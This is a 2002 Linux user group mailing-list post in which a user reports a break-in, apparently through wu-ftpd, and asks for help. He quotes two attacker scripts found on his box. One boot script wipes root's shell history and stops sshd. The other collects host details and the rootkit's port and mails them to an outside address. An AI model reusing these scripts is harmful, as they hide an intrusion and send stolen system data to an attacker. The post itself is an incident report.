[lug] i got hacked
j davis
davis_compz at hotmail.com
Thu Apr 18 15:44:09 MDT 2002
i have a box at a place i do contract work about 2 days a month.
today i could not ssh to it. so iwent on site and discoverd i got
hacked...like a dummy i didnt have tcp wrappers on or a firewall . i think
they exploited wu-ftpd
..i use redhat 7.1 with wu-ftpd 2.6.1-20...i havent got around to upgrading
yet.
anyway here is what i found in /etc/rc3.d/S52remote
#!/bin/sh
rm -rf /root/.bash_history
ln -s /dev/null /root/.bash_history
cd /dev
./ryz -f ./s
/etc/rc.d/init.d/sshd stop
cd /
/usr/bin/trimite
then here is /usr/bin/trimite
#!/bin/sh
echo "* Info : $(uname -a)" >> /tmp/info
echo "* Hostname : $(hostname -f)" >> /tmp/info
echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> /tmp/info
echo "* Uptime : $(uptime)" >> /tmp/info
echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> /tmp/info
echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> /tmp/info
echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> /tmp/info
echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> /tmp/info
echo "* Spatiu Liber: $(df -h)" >> /tmp/info
echo "* Ping la Yahoo: $(ping -c3 yahoo.com)" >> /tmp/info
echo "* Password: $(wc /etc/passwd -l)" >> /tmp/info
echo "* Portul rootkitului este 25897" >> /tmp/info
cat /tmp/info | mail -s "root dupa reboot" ryz_ro at yahoo.com
rm -f /tmp/info
so, netstat says i have something listening on 25897...what should i do?!
never benn hacked before....i already turned off ftp and turned on tcp
wrappers.
help please
jd
_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp.
More information about the LUG
mailing list